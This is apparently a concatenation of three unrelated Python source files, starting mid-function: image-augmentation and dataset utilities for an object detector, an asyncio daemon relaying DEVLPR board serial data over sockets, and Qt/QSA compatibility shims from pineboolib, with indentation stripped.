img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def hist_equalize(img, clahe=True, bgr=False):
# Equalize histogram on BGR image 'img' with img.shape(n,m,3) and range 0-255
yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
if clahe:
c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
yuv[:, :, 0] = c.apply(yuv[:, :, 0])
else:
yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram
return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(8)] # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
# Resize and pad image while meeting stride-multiple constraints
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0,
border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
use_segments = any(x.any() for x in segments)
new = np.zeros((n, 4))
if use_segments: # warp segments
segments = resample_segments(segments) # upsample
for i, segment in enumerate(segments):
xy = np.ones((len(segment), 3))
xy[:, :2] = segment
xy = xy @ M.T # transform
xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine
# clip
new[i] = segment2box(xy, width, height)
else: # warp boxes
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip
new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10)
targets = targets[i]
targets[:, 1:5] = new[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit('../coco128')
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
# Arguments
path: Path to images directory
weights: Train, val, test weights (list)
"""
path = Path(path) # images dir
files = list(path.rglob('*.*'))
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
for i, img in tqdm(zip(indices, files), total=n):
if img.suffix[1:] in img_formats:
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
|
daemon.py
|
import asyncio
import multiprocessing as mp
import logging
from typing import Optional
from pydevlpr_protocol import DataFormatException, unwrap_packet, PacketType, DaemonSocket
from .serif import DevlprSerif
from .DaemonState import DaemonState
from .config import BOARDS, Board, ADDRESS
server = None
state: Optional[DaemonState] = None # Make sure to pass this to any other threads that need access to shared state
devlpr_serial: Optional[DevlprSerif] = None
logging.basicConfig(level=logging.INFO, format=f'%(levelname)s:{__name__}:%(message)s')
class DaemonController:
def __init__(self, board_id: str) -> None:
self.board_id = board_id
def start(self, block=False):
self.p = mp.Process(target=main, args=(self.board_id,))
self.p.start()
if block:
try:
self.p.join()
except KeyboardInterrupt:
self.p.kill()
def stop(self):
if self.p is not None and self.p.is_alive():
self.p.terminate()
def main(board_id: str):
try:
board = BOARDS[board_id]
except KeyError:
logging.warning("Invalid board ID, try get_board_ids() for options")
logging.info('Assuming DEVLPR')
board = BOARDS['DEVLPR']
asyncio.run(startup(board))
async def client_accept(sock: DaemonSocket) -> None:
"""Delegate and process incoming messages from a websocket connection."""
message = ' '
while len(message) > 0:
message = await sock.recv()
if len(message) > 0:
try:
command, data = unwrap_packet(message)
except DataFormatException:
continue # Handle an unexpected issue with the packet
if command == PacketType.SUBSCRIBE:
logging.info("Subscribing to {}".format(data))
try:
state.subscribe(sock, data)
except AttributeError:
logging.error("Failed to subscribe, Daemon State is None")
async def client_handler(reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
"""Main function for socket connections. Holds the connection until the other side disconnects."""
logging.debug("Incoming Connection")
dsock = DaemonSocket(reader, writer)
logging.info("Connected to {0}".format(dsock.get_remote_address()))
try:
await client_accept(dsock)
except (BrokenPipeError, ConnectionError):
pass # Happens if we disconnect non-gracefully, but it's generally fine I think
finally:
logging.info("Disconnected from {0}".format(dsock.get_remote_address()))
try:
state.unsubscribe_all(dsock)
except AttributeError:
logging.error("Failed to unsubscribe_all, Daemon State is None")
async def startup(board: Board) -> None:
"""Initiallizes both the serial connection and the socket server. It then just hangs until everything is done internally before cleaning up."""
global server
global state
global devlpr_serial
# we'll want the asyncio event loop for subscriptions, some processing, and publishing
event_loop = asyncio.get_running_loop()
# the DaemonState requests publishes upon state change, so needs to know the event loop
state = DaemonState(event_loop, board)
# we initialize our serial connection, which is managed on a separate thread
devlpr_serial = DevlprSerif(board)
devlpr_serial.init_serial(state)
# start a server, waiting for incoming subscribers to data (pydevlpr and other libraries)
server = await asyncio.start_server(client_handler, ADDRESS[0], ADDRESS[1])
try:
logging.debug("Started Listening")
await server.serve_forever()
except (asyncio.exceptions.CancelledError):
logging.debug("Closing Server")
await server.wait_closed()
devlpr_serial.deinit_serial()
def shutdown() -> None:
"""Manually closes out the server. Most of the time you don't need to do this because it should close when you exit the program."""
global server
global devlpr_serial
try:
if server is not None and server.is_serving():
server.close()
# asyncio.run_coroutine_threadsafe(server.wait_closed(), asyncio.get_event_loop())
except:
pass
try:
devlpr_serial.deinit_serial()
except AttributeError:
logging.warning("Serial couldn't close because devlpr_serial is already None")
except:
pass # not even sure this is necessary
# TODO this should all probably be part of an object rather than global state
def _get_state():
global state
return state
|
qsatype.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os, fnmatch, re
import datetime, weakref
from lxml import etree
from io import StringIO
from PyQt5 import QtCore, QtGui, QtWidgets
# Cargar toda la API de Qt para que sea visible.
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtCore import QIODevice
from pineboolib import qsaglobals
from pineboolib import flcontrols
from pineboolib.fllegacy import FLFormSearchDB as FLFormSearchDB_legacy
from pineboolib.flcontrols import FLTable, QLineEdit
from pineboolib.fllegacy import FLSqlQuery as FLSqlQuery_Legacy
from pineboolib.fllegacy import FLSqlCursor as FLSqlCursor_Legacy
from pineboolib.fllegacy import FLTableDB as FLTableDB_Legacy
from pineboolib.fllegacy import FLUtil as FLUtil_Legacy
from pineboolib.fllegacy import FLReportViewer as FLReportViewer_Legacy
from pineboolib.utils import filedir
from pineboolib import decorators
import traceback
from PyQt5.Qt import QWidget
class StructMyDict(dict):
def __getattr__(self, name):
try:
return self[name]
except KeyError as e:
raise AttributeError(e)
def __setattr__(self, name, value):
self[name] = value
def Function(args, source):
# Leer código QS embebido en Source
# asumir que es una funcion anónima, tal que:
# -> function($args) { source }
# compilar la funcion y devolver el puntero
qs_source = """
function anon(%s) {
%s
} """ % (args,source)
print("Compilando QS en línea: ", qs_source)
from pineboolib.flparser import flscriptparse
from pineboolib.flparser import postparse
from pineboolib.flparser.pytnyzer import write_python_file, string_template
import io
prog = flscriptparse.parse(qs_source)
tree_data = flscriptparse.calctree(prog, alias_mode = 0)
ast = postparse.post_parse(tree_data)
tpl = string_template
f1 = io.StringIO()
write_python_file(f1,ast,tpl)
pyprog = f1.getvalue()
print("Resultado: ", pyprog)
glob = {}
loc = {}
exec(pyprog, glob, loc)
# ... y lo peor es que funciona. W-T-F.
return loc["anon"]
def Object(x=None):
if x is None: x = {}
return StructMyDict(x)
#def Array(x=None):
#try:
#if x is None: return {}
#else: return list(x)
#except TypeError:
#return [x]
class Array(object):
dict_ = None
key_ = None
def __init__(self, data = None):
if not data:
self.dict_ = {}
elif isinstance(data, int):
self.dict_ = {} # dimensiones por ahora a cero
else:
self.dict_ = data
def __setitem__(self, key, value):
#if isinstance(key, int):
#key = str(key)
self.dict_[key] = value
def __getitem__(self, key):
#if isinstance(key, int):
#key = str(key)
#print("QSATYPE.DEBUG: Array.getItem() " ,key, self.dict_[key])
return self.dict_[key]
def __getattr__(self, k):
if k == 'length':
return len(self.dict_)
def Boolean(x=False): return bool(x)
def FLSqlQuery(*args):
#if not args: return None
query_ = FLSqlQuery_Legacy.FLSqlQuery(*args)
return query_
def FLUtil(*args):
return FLUtil_Legacy.FLUtil(*args)
def AQUtil(*args):
return FLUtil_Legacy.FLUtil(*args)
def FLSqlCursor(action=None):
if action is None: return None
return FLSqlCursor_Legacy.FLSqlCursor(action)
def FLTableDB(*args):
if not args: return None
return FLTableDB_Legacy.FLTableDB(*args)
FLListViewItem = QtWidgets.QListView
QTable = FLTable
Color = QtGui.QColor
QColor = QtGui.QColor
QDateEdit = QtWidgets.QDateEdit
@decorators.NotImplementedWarn
def FLPosPrinter(*args, **kwargs):
class flposprinter:
pass
return flposprinter()
@decorators.BetaImplementation
def FLReportViewer():
return FLReportViewer_Legacy.FLReportViewer()
class FLDomDocument(object):
parser = None
tree = None
root_ = None
string_ = None
def __init__(self):
self.parser = etree.XMLParser(recover=True, encoding='utf-8')
self.string_ = None
def setContent(self, value):
try:
self.string_ = value
if value.startswith('<?'):
value = re.sub(r'^\<\?.*?\?\>','', value, flags=re.DOTALL)
self.tree = etree.fromstring(value, self.parser)
#self.root_ = self.tree.getroot()
return True
except:
return False
@decorators.NotImplementedWarn
def namedItem(self, name):
return True
def toString(self, value = None):
return self.string_
@decorators.NotImplementedWarn
def FLCodBar(*args, **kwargs):
class flcodbar:
def nameToType(self, name):
return name
def pixmapError(self):
return QtGui.QPixmap()
def pixmap(self):
return QtGui.QPixmap()
def validBarcode(self):
return None
return flcodbar()
def print_stack(maxsize=1):
for tb in traceback.format_list(traceback.extract_stack())[1:-2][-maxsize:]:
print(tb.rstrip())
def check_gc_referrers(typename, w_obj, name):
import threading, time
def checkfn():
import gc
time.sleep(2)
gc.collect()
obj = w_obj()
if not obj: return
# TODO: Si ves el mensaje a continuación significa que "algo" ha dejado
# ..... alguna referencia a un formulario (o similar) que impide que se destruya
# ..... cuando se deja de usar. Causando que los connects no se destruyan tampoco
# ..... y que se llamen referenciando al código antiguo y fallando.
print("HINT: Objetos referenciando %r::%r (%r) :" % (typename, obj, name))
for ref in gc.get_referrers(obj):
if isinstance(ref, dict):
x = []
for k,v in ref.items():
if v is obj:
k = "(**)" + k
x.insert(0,k)
else:
x.append(k)
print(" - ", repr(x[:48]))
else:
if "<frame" in str(repr(ref)): continue
print(" - ", repr(ref))
threading.Thread(target = checkfn).start()
class FormDBWidget(QtWidgets.QWidget):
closed = QtCore.pyqtSignal()
cursor_ = None
def __init__(self, action, project, parent = None):
super(FormDBWidget, self).__init__(parent)
self._action = action
self.cursor_ = FLSqlCursor(action.name)
self._prj = project
self._class_init()
def __del__(self):
print("FormDBWidget: Borrando form para accion %r" % self._action.name)
def _class_init(self):
pass
def closeEvent(self, event):
can_exit = True
print("FormDBWidget: closeEvent para accion %r" % self._action.name)
check_gc_referrers("FormDBWidget:"+self.__class__.__name__, weakref.ref(self), self._action.name)
if hasattr(self, 'iface'):
check_gc_referrers("FormDBWidget.iface:"+self.iface.__class__.__name__, weakref.ref(self.iface), self._action.name)
del self.iface.ctx
del self.iface
if can_exit:
self.closed.emit()
event.accept() # let the window close
else:
event.ignore()
def child(self, childName):
try:
ret = self.findChild(QtWidgets.QWidget, childName)
except RuntimeError as rte:
# FIXME: A veces intentan buscar un control que ya está siendo eliminado.
# ... por lo que parece, al hacer el close del formulario no se desconectan sus señales.
print("ERROR: Al buscar el control %r encontramos el error %r" % (childName,rte))
print_stack(8)
import gc
gc.collect()
print("HINT: Objetos referenciando FormDBWidget::%r (%r) : %r" % (self, self._action.name, gc.get_referrers(self)))
if hasattr(self, 'iface'):
print("HINT: Objetos referenciando FormDBWidget.iface::%r : %r" % (self.iface, gc.get_referrers(self.iface)))
ret = None
else:
if ret is None:
print("WARN: No se encontró el control %r" % childName)
#else:
# print("DEBUG: Encontrado el control %r: %r" % (childName, ret))
return ret
def cursor(self):
cursor = None
try:
if self.parentWidget():
cursor = getattr(self.parentWidget(),"cursor_", None)
if cursor and not cursor is self.cursor_ :
return cursor
except Exception:
# FIXME: A veces parentWidget existía pero fue eliminado. Da un error
# ... en principio debería ser seguro omitir el error.
pass
return self.cursor_
def FLFormSearchDB(name):
widget = FLFormSearchDB_legacy.FLFormSearchDB(name)
widget.setWindowModality(QtCore.Qt.ApplicationModal)
widget.load()
widget.cursor_.setContext(widget.iface)
return widget
class Date(object):
date_ = None
time_ = None
def __init__(self):
super(Date, self).__init__()
self.date_ = QtCore.QDate.currentDate()
self.time_ = QtCore.QTime.currentTime()
def toString(self, *args, **kwargs):
texto = "%s-%s-%sT%s:%s:%s" % (self.date_.toString("yyyy"),self.date_.toString("MM"),self.date_.toString("dd"),self.time_.toString("hh"),self.time_.toString("mm"),self.time_.toString("ss"))
return texto
def getYear(self):
return self.date_.year()
def getMonth(self):
return self.date_.month()
def getDay(self):
return self.date_.day()
def getHours(self):
return self.time_.hour()
def getMinutes(self):
return self.time_.minute()
def getSeconds(self):
return self.time_.second()
def getMilliseconds(self):
return self.time_.msec()
@decorators.NotImplementedWarn
class Process(object):
def __init__(self):
pass
@decorators.BetaImplementation
class RadioButton(QtWidgets.QRadioButton):
pass
class Dialog(QtWidgets.QDialog):
_layout = None
buttonBox = None
OKButtonText = None
cancelButtonText = None
OKButton = None
cancelButton = None
def __init__(self, title, f, desc=None):
#FIXME: f no lo uso , es qt.windowsflg
super(Dialog, self).__init__()
self.setWindowTitle(title)
self.setWindowModality(QtCore.Qt.ApplicationModal)
self._layout = QtWidgets.QVBoxLayout()
self.setLayout(self._layout)
self.buttonBox = QtWidgets.QDialogButtonBox()
self.OKButton = QtWidgets.QPushButton("&Aceptar")
self.cancelButton = QtWidgets.QPushButton("&Cancelar")
self.buttonBox.addButton(self.OKButton, QtWidgets.QDialogButtonBox.AcceptRole)
self.buttonBox.addButton(self.cancelButton, QtWidgets.QDialogButtonBox.RejectRole)
self.OKButton.clicked.connect(self.accept)
self.cancelButton.clicked.connect(self.reject)
def add(self, _object):
self._layout.addWidget(_object)
def exec_(self):
if (self.OKButtonText):
self.OKButton.setText(self.OKButtonText)
if (self.cancelButtonText):
self.cancelButton.setText(self.cancelButtonText)
self._layout.addWidget(self.buttonBox)
return super(Dialog, self).exec_()
class GroupBox(QtWidgets.QGroupBox):
def __init__(self):
super(GroupBox, self).__init__()
self._layout = QtWidgets.QHBoxLayout()
self.setLayout(self._layout)
def add(self, _object):
self._layout.addWidget(_object)
class CheckBox(QtWidgets.QCheckBox):
pass
class Dir(object):
path_ = None
home = None
def __init__(self, path):
self.path_ = path
self.home = filedir("..")
def entryList(self, patron):
p = os.walk(self.path_)
retorno = []
for file in os.listdir(self.path_):
if fnmatch.fnmatch(file, patron):
retorno.append(file)
return retorno
class File(QtCore.QFile):
fichero = None
mode = None
ReadOnly = QIODevice.ReadOnly
